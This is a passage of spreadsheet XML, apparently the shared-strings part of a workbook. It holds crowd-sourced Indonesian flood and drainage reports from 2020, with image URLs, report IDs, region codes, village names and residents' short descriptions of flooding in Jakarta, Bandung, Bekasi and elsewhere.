    <t>https://lh3.googleusercontent.com/3nFXgzSXdbC3BuL9DH-1TL03sstW506b_Nw0I6YDxy-6HCCP60oRJPs1xz68122-dNjt3TTQWVS8LtJbF15ldNe7x11c=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "958", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di lampu merah ITC FATMAWATI.</t>
  </si>
  <si>
    <t>Gandaria Selatan</t>
  </si>
  <si>
    <t>72b55bf5-c11f-40eb-af56-62290481f3dd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72b55bf5-c11f-40eb-af56-62290481f3dd.jpg</t>
  </si>
  <si>
    <t>perum galaxy</t>
  </si>
  <si>
    <t>1d116abb-5986-4960-a6e6-bcea08c95421</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d116abb-5986-4960-a6e6-bcea08c95421.jpg</t>
  </si>
  <si>
    <t>Banjir di Duren Jaya, Bekasi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Vb-P_lokMbZikuLe0iCqkx1daur4b8WGHjkndNPgnMxmbBVE4SQu7M34pWP0PhtCFrzr2o0Wmjjhy0sUd7LNerZyhTHd=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "972", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil air got tidak berjalan hujan sedikit langsung meluap"</t>
  </si>
  <si>
    <t>980d4f4b-353b-47d3-b944-627054150b39</t>
  </si>
  <si>
    <t>https://images.petabencana.id/980d4f4b-353b-47d3-b944-627054150b39.jpg</t>
  </si>
  <si>
    <t>Setiap hujan, jl. Raya nusantara  dgn jalan flores raya. Kel. Aren jaya bekasi.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/uRQHZQ_pUsHRFGgfDmqmOjz4AelNn9K8fnvqqCrGU_MZy6RJUU3wC1FDmbdqodMuETh6dMw1oRKrR1WQ3ShAAWuvKaW-=s480-c</t>
  </si>
  <si>
    <t>banjir lagi kp.sanggrahan 1bulan 3x bnjir</t>
  </si>
  <si>
    <t>e897f90a-febc-4759-b5b5-23bd088372fe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e897f90a-febc-4759-b5b5-23bd088372fe.jpg</t>
  </si>
  <si>
    <t>Majakerta</t>
  </si>
  <si>
    <t>Majalaya</t>
  </si>
  <si>
    <t>0.8</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2AtNpEGq0vCKwNM_EmwdW92NsVJICr377kXKPv3g-RHkHOpGZMY-VMMYCTYt1FkKW9PApFuzscNTsNk2LfxulYn0C8I=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1394", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon ditindak lanjuti pak got atau saluran air di sebelah rumah saya mampet sangat potensi menimbulkan banjir lokasi di Jalan Rasamala IV No. 02 e RT 06 RW 13 (sebelah rumah Supriyanto dekat bekas bongkaran sekolah SLB Asih Budi) terima kasih"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/yeORZpe-YZZmBmTfn64TuF-L0z_9eWD74uKB3Zr2H-Uy-iboXdkzikSHB6FObc0j8j1cWaKsZGBy8sszXiw--xqCGWM=s480-c</t>
  </si>
  <si>
    <t>hujan sebentar sudah banjir....dikarenakan ada penutupan saluran</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/UVaX5ygabVocRY4FWdaKCR_rbobpQ0PmEBA5WVoXrNe9YRwdmYFoSxBRYH-rZKZoow0qTkhNiOdDguDhNmdkr5NHHrc=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MS8z28QHP8Tpw9PYhdKehhyPFdWY3Zq-XyS1912xkCY-6u_OIdAVxmw4Jnu_qYIL4k6sb9DWzuP_Yd4ee5bT7PvUuFg=s480-c</t>
  </si>
  <si>
    <t>tolong ya para pejabat kelurahan semanan yg terhormat perhatikan nih kampung saya yg gk ada saluran airnya kalian ini ngecek doank tp gk ada action nya tiap ujan dikit banjir, air ini aliran dr belakang samping depan rumah saya tolonglah perhatikan karna</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/aSOpqVt2sRCisdJwf5OQ894ESkCrxtPzplZP592_TzGBIzZmDX1lbTLrPZrdhW4b0t-kUeOoFNNJSfRakD0jiaackBgM=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "190", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>potensi banjir</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350544</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/03/22/1584845725444700357.jpg</t>
  </si>
  <si>
    <t>Cirebon Diguyur Hujan 5 Jam, Desa Gunung Sari Banjir</t>
  </si>
  <si>
    <t>Kabupaten Cirebon Diguyur Hujan Selama 5 Jam Mengakibatkan Banjir Di Desa Gunung Sari, Cirebon Timur. Hujan turun dari pukul 12 malam hingga pukul 5 pagi mengakibatkan sungai Ciberes meluap dan membanjiri rumah warga Desa Gunung Sari. Kecamatan Waled K"</t>
  </si>
  <si>
    <t>Ciuyah</t>
  </si>
  <si>
    <t>Waled</t>
  </si>
  <si>
    <t>9facfdca-9d47-4060-8085-c2ba724a3702</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9facfdca-9d47-4060-8085-c2ba724a3702.jpg</t>
  </si>
  <si>
    <t>Udah takut corona, banjir, double kill dah!</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Da-qWje5HzpYFI_7OWb4G1Hvab0GgJrx5W9Q_1g1gccybrtwVW4XcHO9Ff3iiYaXb0hqpumlw_PBlsMXOm0qcFQA5r7s=s480-c</t>
  </si>
  <si>
    <t>tolong pihak kelurahan semanan ...apa karena sudah menerima dari pengembang Grand Citra Puri sehingga km sebagai warga dikorbankan....saluran kami mohon diperhatikan mana amdal daribpengembang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/m3VZ27sePGPisebOy40hrwNnW9abGxeQkkuVNLS3Dcb-NL4tSQi6onuaGdkQQAOfL72JfZeKw2LghbXIQ7Z5OU7cjMk=s480-c</t>
  </si>
  <si>
    <t>63f39a14-cca2-414d-ba88-e0019d9ce016</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63f39a14-cca2-414d-ba88-e0019d9ce016.jpg</t>
  </si>
  <si>
    <t>37c47ce7-82b7-473d-802f-5c18a9a1f8ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37c47ce7-82b7-473d-802f-5c18a9a1f8ac.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-NB" }</t>
  </si>
  <si>
    <t>Kempo</t>
  </si>
  <si>
    <t>Dompu</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350605</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/03/24/350605-15850268561136431367.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-BB" }</t>
  </si>
  <si>
    <t>Antisipasi Banjir, Sungai Pasar Muntok Dikeruk</t>
  </si>
  <si>
    <t>Antisipasi Banjir di musim penghujan ini, pengusaha Muntok, Eddy Nayu turunkan alat berat untuk mengeruk alur sungai yang sudah dangkal dan penuh dengan pasir di Sungai Pasar Muntok, Selasa 24/3. ''Semoga semua berjalan dan pasar tidak banjir lagi saat h</t>
  </si>
  <si>
    <t>Tanjung</t>
  </si>
  <si>
    <t>Mentok</t>
  </si>
  <si>
    <t>Bangka Barat</t>
  </si>
  <si>
    <t>Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/uyrJgyNFSuOWt7QOzJ8kst6AdPV2Xpz2khuk03fdQNfb9mVNbMlPxQ-YBM3dR_wi-fcrIE8kmlqLEPKcwT2IrwQL8pzBAQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "771", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong di bongkar d TL</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hl80fKoQRYUYufzsvJXgeCbu4jaVpxmAb9D0i92Uv3Lmo3DWl0xjH6OI5f7tQTxVGkSUpO9SI8NMqEdrz9kA7ZfiWpqbVA=s480-c</t>
  </si>
  <si>
    <t>ini rumah bukan buat mesum</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TAaP5K-nQRAEwAk6Zer3nlN45ICcTwcCih95hDEOo6C6eXixYQV3aM5U5-C1lCe3_hwmiCyHa9BrdTId_oLG3y86NFjekg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "490", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>rumah ini buat mesum tolong d bongkar segerah TL</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/6a2LqSyfUwtjmUoz-Zw4uyZhOcLEY3MHEnvF28QBikl1c9mk91D1OVWaG6HVrz_87sQlqddFrvGFI5ZVxMBE3umCc_wW=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil ...Jalan rusak</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350639</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/03/25/350639-1585098738369263614.mp4-03.jpg</t>
  </si>
  <si>
    <t>Jalan Raya Bojong Gede Rusak Berat, Bak Kubangan Kerbau</t>
  </si>
  <si>
    <t>Tampak kondisi jalan semakin rusak parah dan sudah banyak pengendara yang mengalami kecelakaan. Lokasi tidak jauh dari pertigaan Bambu Kuning Tegar Beriman. Tepatnya di sekitar Jl. Raya Bojong Gede Bojong Baru Kec. Bojong Gede Bogor Jawa Barat 169"</t>
  </si>
  <si>
    <t>Sukamaju</t>
  </si>
  <si>
    <t>Cilodong</t>
  </si>
  <si>
    <t>7682989a-a7bc-4a81-95e4-c321862cea70</t>
  </si>
  <si>
    <t>Motor banyak yang mogok, tapi gak semua</t>
  </si>
  <si>
    <t>Margahayu Utara</t>
  </si>
  <si>
    <t>Babakan Ciparay</t>
  </si>
  <si>
    <t>e3a05401-24a7-4e39-b685-5fbf00fbf4e3</t>
  </si>
  <si>
    <t>Banyak yg balik arah</t>
  </si>
  <si>
    <t>1551ce06-47ef-40f7-929d-ce5ae1d106f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1551ce06-47ef-40f7-929d-ce5ae1d106f9.jpg</t>
  </si>
  <si>
    <t>Banjir se mata kaki orang dewasa</t>
  </si>
  <si>
    <t>31fd822c-cc91-4d1b-9ec2-d6728ef7ad6e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31fd822c-cc91-4d1b-9ec2-d6728ef7ad6e.jpg</t>
  </si>
  <si>
    <t>Banjir kopo nata endah sekitar proyek kereta api cepat miko mall</t>
  </si>
  <si>
    <t>Margahayu Tengah</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350833</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/03/31/350833-15855949191211453233.mp4-03.jpg</t>
  </si>
  <si>
    <t>Debit Air Sungai Cikeruh Meningkat, Begini Kondisinya</t>
  </si>
  <si>
    <t>Suasana debit air sungai Cikeruh terkini di jembatan penyeberangan Cikeruh-Puri Indah Desa Cikeruh Jatinangor Sumedang sudah mulai ada peningkatan, Senin, (30/03/2020) petang pkl. 17.30 WIB</t>
  </si>
  <si>
    <t>97d2f62c-2432-40c6-a984-9bbc84d69742</t>
  </si>
  <si>
    <t>https://images.petabencana.id/97d2f62c-2432-40c6-a984-9bbc84d69742.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek Griya Cempaka Arum, Gedebage</t>
  </si>
  <si>
    <t>Rancanumpang</t>
  </si>
  <si>
    <t>Gedebage</t>
  </si>
  <si>
    <t>8dac79bb-8a6f-4ec5-9ad1-2b5dfe2b8465</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8dac79bb-8a6f-4ec5-9ad1-2b5dfe2b8465.jpg</t>
  </si>
  <si>
    <t>b11a7c57-7b9c-4a5f-9221-50e6069cfc5d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b11a7c57-7b9c-4a5f-9221-50e6069cfc5d.jpg</t>
  </si>
  <si>
    <t>30 Mar 2020. Banjir di Komplek Senam Indah, Arcamanik, Bandung. Karena tanggul jebol. Hujan sejak pulul 3 sore hingga sekarang tsk berhenti</t>
  </si>
  <si>
    <t>Sukamiskin</t>
  </si>
  <si>
    <t>Arcamanik</t>
  </si>
  <si>
    <t>84b54094-b91a-4b5e-90bd-840ee568dc92</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84b54094-b91a-4b5e-90bd-840ee568dc92.jpg</t>
  </si>
  <si>
    <t>Moh toha se mata kaki</t>
  </si>
  <si>
    <t>Ciseureuh</t>
  </si>
  <si>
    <t>Regol</t>
  </si>
  <si>
    <t>eac0102e-b7f1-419b-9f83-aac048b14b63</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eac0102e-b7f1-419b-9f83-aac048b14b63.jpg</t>
  </si>
  <si>
    <t>Sayati</t>
  </si>
  <si>
    <t>785228c9-d55c-4b33-a9fb-9c3e7d06bce3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/785228c9-d55c-4b33-a9fb-9c3e7d06bce3.jpg</t>
  </si>
  <si>
    <t>banjir bandang di jln sindoro-sumbing. desa kabelukan.</t>
  </si>
  <si>
    <t>Candiyasan</t>
  </si>
  <si>
    <t>Kertek</t>
  </si>
  <si>
    <t>Wonosobo</t>
  </si>
  <si>
    <t>992fcb78-6ba7-4a5d-b1bb-cf9b43d208dd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/992fcb78-6ba7-4a5d-b1bb-cf9b43d208dd.jpg</t>
  </si>
  <si>
    <t>Banjir di GBA 3. Di luar rumah 50 cm, di dalam rumah 20 cm</t>
  </si>
  <si>
    <t>Cipagalo</t>
  </si>
  <si>
    <t>7c6fc530-6d30-4e4b-a84d-b6989da0983b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c6fc530-6d30-4e4b-a84d-b6989da0983b.jpg</t>
  </si>
  <si>
    <t>Cipadung Kidul</t>
  </si>
  <si>
    <t>Panyileukan</t>
  </si>
  <si>
    <t>6ebfa410-f0a0-456f-be8d-9331b2aa8166</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 88, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir dayeuhkolot</t>
  </si>
  <si>
    <t>1c5ce1a9-eabd-4b6a-825d-42aed6dec7ff</t>
  </si>
  <si>
    <t>Banjir semata kaki di jalanan komplek, air rembes di beberapa rumah warga</t>
  </si>
  <si>
    <t>Cijaura</t>
  </si>
  <si>
    <t>1175c89e-e885-4906-a352-2a9f5d903d5e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1175c89e-e885-4906-a352-2a9f5d903d5e.jpg</t>
  </si>
  <si>
    <t>f390c789-c9dc-4969-960a-12ef3e0927e5</t>
  </si>
  <si>
    <t>banjir daerah dayeuhkolot dan sekitarnya</t>
  </si>
  <si>
    <t>57007cf1-bc34-4d18-aacf-029330d7596f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/57007cf1-bc34-4d18-aacf-029330d7596f.jpg</t>
  </si>
  <si>
    <t>Gambar di posko pengungsi banjir dayeuhkolot. Dayeuh kolot masih terendam.Saat ini ada 65kk yang berada disana.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350936</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/02/1585824023545257250.jpg</t>
  </si>
  <si>
    <t>Drainase Tak Berfungsi, Genangan Air Rendam Jalan Kincan</t>
  </si>
  <si>
    <t>Meski hujan sudah beberapa hari yang lalu, Jalan Kincan Bekasi masih tergenang air imbas drainase tidak berfungsi</t>
  </si>
  <si>
    <t>34f38107-2e81-40e9-88a1-50744ad156ce</t>
  </si>
  <si>
    <t>ga banjir</t>
  </si>
  <si>
    <t>Banyumudal</t>
  </si>
  <si>
    <t>Moga</t>
  </si>
  <si>
    <t>Pemalang</t>
  </si>
  <si>
    <t>2c17ce0e-d06f-4a99-820b-2984755e50ba</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "276", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jakarta timur</t>
  </si>
  <si>
    <t>Kota Bambu Selatan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/350951</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/03/1585847709234886132.jpg</t>
  </si>
  <si>
    <t>Hujan Deras, Genangan Air Rendam Jalan Ahmad Dahlan Ciamis</t>
  </si>
  <si>
    <t>Saat hujan deras turun, genangan air di Jalan Ahmad Dahlan Ciamis selalu terlihat. Seperti sore  ini, Kamis, (02/04/2020), hujan yang mengguyur wilayah perkotaan Ciamis membuat air menggenang di jalan tersebut. Jalan yang selalu dilewati angkutan umum, k</t>
  </si>
  <si>
    <t>b9ed3c21-fe68-4c4b-96f6-f70921169408</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b9ed3c21-fe68-4c4b-96f6-f70921169408.jpg</t>
  </si>
  <si>
    <t>Banjir kini mulai surut namun secara perlahan</t>
  </si>
  <si>
    <t>0ec49249-2bc0-4896-b790-e5844bd211d7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0ec49249-2bc0-4896-b790-e5844bd211d7.jpg</t>
  </si>
  <si>
    <t>Jl.Sapan Kawasan industri De Prima Terra</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/FalMvYovop8bStIsl0x9v6OPyDston2T9wLffhbpfdctugA9Wj6MPR0E37V8IA7DbYwiVudVkxp8QdXqN_Ab5EN0v_GUuw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2186", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>perlu perbaikan saluran</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351014</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/04/15859977991265336598.jpg</t>
  </si>
  <si>
    <t>Imbas Longsor, Air Kali Cibaragalan Meluap ke Sawah</t>
  </si>
  <si>
    <t>Air kali Cibaragalan yang berada di Wangsareka Desa Karanganyar Cijeungjing Ciamis meluap sehingga airnya membanjiri sawah. Hal itu akibat dari tertutupnya kali dengan tanah longsoran</t>
  </si>
  <si>
    <t>fb8faaac-b986-4009-9461-ebf80e76df4e</t>
  </si>
  <si>
    <t>Banjir di sekitar kawasan industri tegalluar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/a4nH2fT6xHPSv_XLpJIeOYZPiGw9d5s6a7UZWFZ2Eehn1CxEWFfXm12QDJn6rPDAGc6On4agQVJFqiwR2JXwA16bo5w=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap baru hujan 5 menit air sudah tergenang ke jalan</t>
  </si>
  <si>
    <t>9ef3e669-dfc8-4cab-8c1c-711673c2671b</t>
  </si>
  <si>
    <t>Banjir se knalpot motor</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/x8C6YHrVcod6N_pdaLYo4N5Cs0aLqh4ufcKsW86x1A-z3W1eX1bNy_EUNVohsBOne-zjNn7B5OmhBNTgrYQLXTkBYM317w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1114", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>semoga tidak banjir \u1f64f</t>
  </si>
  <si>
    <t>Malaka Jaya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351088</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/07/15861946901338997478.jpg</t>
  </si>
  <si>
    <t>Banjir di Jalan Gatsu Tepatnya Depan Menara Jamsostek</t>
  </si>
  <si>
    <t>Banjir depan menara Jamsostek Jl. Gatot Subroto nih</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351089</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/07/1586194754721727680.jpg</t>
  </si>
  <si>
    <t>Diguyur Hujan, Genangan Air Rendam Jalan Widya Chandra VIII</t>
  </si>
  <si>
    <t>Genangan air juga merendam kawasan Widya Chandra VIII arah SCBD.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/aKhsVqAbDB5G9895hHdmdHIasSiU01xk2jzrrJFHgRpfKp-uDu1FsytAu8XRI4plU6OYpKQ6c-DOGHnx8hWVxwZjsaq8Cg=s480-c</t>
  </si>
  <si>
    <t>pintu air buka air kali pesanggrahan meluap</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jDHzaHmBppxH89AciXG5vvxIH9KCjVSgvGARxRWIWBVUAF6TjPdOfMe33AkC88YS0ylO8vSw8IYrxqGmvAATCjR-TW8=s480-c</t>
  </si>
  <si>
    <t>RT1 &amp; 2 / RW4 Kecamatan Makasar, Kelurahan Cipinang Melayu banjir lagi ... kondisi sekarang masih hujan. Tolong bantuannya instansi yang terkait YG menjaga pintu air #KaliMeluap #BanjirKiriman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GVDB02a_5urDaCDC51Tg5VaVacZuwpcecbGrVkGYhLcdsi3-OAfwR5z1TWs4tGu8jM7IymAgNPbRBwwDQjK49Xns3v8=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil banjir di dapan Bizpark 2 sampe masuk ke rumah, mana nihh Bu lurah nya penggilingan gak ada TLnya, tiap hujan deres banjir...</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351091</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/04/06/351091-15861707401307357350.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1511", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan Sore ini, Jalan Arun Raya Timbul Genangan Air</t>
  </si>
  <si>
    <t>Jalan Arun Raya, Ujung Menteng, Kec. Cakung, Kota Jakarta Timur terendam banjir.</t>
  </si>
  <si>
    <t>9ff38153-9aff-4e7c-94ff-00556aff7e4b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ff38153-9aff-4e7c-94ff-00556aff7e4b.jpg</t>
  </si>
  <si>
    <t>DESKRIPSI APAAN LAGI ANJING, ORANG JELAS WES KEBANJIRAN.</t>
  </si>
  <si>
    <t>3c147c29-64fa-40dd-a53a-a05e44352565</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c147c29-64fa-40dd-a53a-a05e44352565.jpg</t>
  </si>
  <si>
    <t>kp. sayang ds. rancatungku banjir dr cisangkuy</t>
  </si>
  <si>
    <t>Rancatungku</t>
  </si>
  <si>
    <t>Pameungpeuk</t>
  </si>
  <si>
    <t>51b32abb-51eb-4fbd-b412-aa62bdf401c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/51b32abb-51eb-4fbd-b412-aa62bdf401c0.jpg</t>
  </si>
  <si>
    <t>Lokasi Semolowaru Elok</t>
  </si>
  <si>
    <t>Semolowaru</t>
  </si>
  <si>
    <t>cbeb751e-3d18-4388-993f-cd40ad3cb3ae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cbeb751e-3d18-4388-993f-cd40ad3cb3ae.jpg</t>
  </si>
  <si>
    <t>Banjir menahun setiap musim hujan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/IKlXmLO41yn71gh-rYWuI4SbPEFDPhzlbyNs0Klg898UIUKpjq9hYGVKwcLtT8rSU7mNXp6dPDXN0lZ13UWrs0CtUe_brQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2276", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>got mampet yng tak pernah terselesaikan mohon di adakan pengerukan got."</t>
  </si>
  <si>
    <t>3d072a46-a9d0-4c1a-924e-c37af4fe65eb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3d072a46-a9d0-4c1a-924e-c37af4fe65eb.jpg</t>
  </si>
  <si>
    <t>tolong tindakan ya motor saya kasian dan juga saya mau pulang ini ya ampun kerendem udah dikit lagi hanyut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/L3QAqLB10859pip8gV7VQX6LyFd9INCAhQ6yPdvLptfzRp7nGu5YAKPtQ9uJ1WJrP_WXLVI5jMwykLGMnuZrn8rgtIg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1966", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lingkungan kami di Rt 08 Rw 02 cijantung, pasar rebo, Jakarta timur. Sering terjadi banjir, padahal hujannya tidak begitu deras, sepertinya karena saluran air kotor atau terhambat. Foto ini diambil ketika banjir sudah surut. #SaluranKotor #SampahDiSalura"</t>
  </si>
  <si>
    <t>Cijantung</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/n3eZXkNeT2t5Ti2HCqmurZLilYub6OkJi0Lu-ytuRsXbNag_mHR7O0KVFFeCgfyaDq1IW2UdNpKoXBVPiXlMfiD1H1U=s480-c</t>
  </si>
  <si>
    <t>Depan SDN 08 Batu Ampar, banyak sampah terbawa arus air. Tidak tahu pasti dari mana sampah tsb. Biasanya genangan air saja tanpa sampah. Skrg membawa sampah.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/hH1xzkPFSCJyt9LEfgZJ9U0sW2Y5cB3gZNe-TmAe-ngWywsghPDyXdjVYhJbfe7SoaDnSs_T2Zr4jQVVBepXh28-N_d5GA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "961", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jl gintung 1 gg gotong royong tanjung barat langganan banjir...... kapan mau dibuatkan saluran airnya? bosan kami sama survei tanpa realisasi"</t>
  </si>
  <si>
    <t>Tanjung Barat</t>
  </si>
  <si>
    <t>d2e51220-6525-4622-ade3-e040766b1a07</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d2e51220-6525-4622-ade3-e040766b1a07.jpg</t>
  </si>
  <si>
    <t>Gamprit 2. Jatiwaringin. Pondokgede</t>
  </si>
  <si>
    <t>c68a7407-46cd-4ec2-b79c-0ee6081ef5b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c68a7407-46cd-4ec2-b79c-0ee6081ef5b8.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4AP8s_x_gJ33XXbktHMTXCJKoesmFZBKLbazty3NgyYmD-YoG9kayYTS_wDrwC3t25nw5I4EGOlZLoh8m8XlB6HTClc=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1701", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap  kali di tutup jadi bangunan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/X1MOEZL355Obuq8XuNTQl0DtEhY82wxipLiFLyjK77o_HdZp6YMH9So0qhEtXgfMorJ7hGg2rrMsdYS3U-4fFe_S6fwM=s480-c</t>
  </si>
  <si>
    <t>Warga RW04 Kelurahan Cipinang Melayu kembali kebanjiran malam ini Karena kali tidak bisa menampung air hujan yang turun lebih dari sejam. Kondisi hujan sudah reda namun air naik memasuki rumah Warga. Mohon dibantu instansi terkait   yg menjaga pintu air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/a0Nutux6ieH10L4CSzDcy5difZh1YAJrCy_jb5v34tehtEWT_APYKayE95-4EmKTAoV2LryYtf5frK7ttKaFeYqAqAEFbg=s480-c</t>
  </si>
  <si>
    <t>jl kelapa sawit raya sungai meluap ga mampu tampung air hujan sungainya kecil</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/AN1YnEDc2gaY960pG9f4-TM3Gdk0PxDevTFgwP00jqcUIA4IgjW7Vd4XrrpkRs82pTGcP1s5-9s1W7Zd3x2Tag1nnMMc=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "354", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>BARU HUJAN (SEDANG) -+ 30 MENIT, JALAN TAMAN SARI RAYA..BANJIR. SUDAH SERING KALI &amp; SEKIAN LAMA DI SAMPAIKAN, BAHWA GOT DI JALAN TAMAN SARI RAYA NO ANTARA NO 81 - 83.GORONG - GORONG MENYEMPIT. NAMUN,TIDAK PERNAH DI BONGKAR &amp; DI PERBAIKI OLEH..PETUGAS YAN</t>
  </si>
  <si>
    <t>2959f769-b59d-44b0-9f9d-1d71045f64c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2959f769-b59d-44b0-9f9d-1d71045f64c2.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/esahQrZpJOIAa7zaoFQvEMqb23usdJ7lN4oRxpP0NA0dADjr0JRqJONEYqsGsnKY8u-AuHsBfDc2lhKgyLc34J58wKxD=s480-c</t>
  </si>
  <si>
    <t>SALURAN AIR / GOT  DI JALAN TAMAN SARI RAYA NO 81 - 83, PENYEBAB CEPAT BANJIR SURUT LAMA DI KARENAKAN..GORONG - GORONG MENYEMPIT (SEHINGGA MENGHAMBAT KELANCARAN AIR HUJAN. SUDAH SEKIAN LAMA &amp; SERING KALI DI LAPORKAN, NAMUN..GORONG -GORONG TERSEBUT TIDAK</t>
  </si>
  <si>
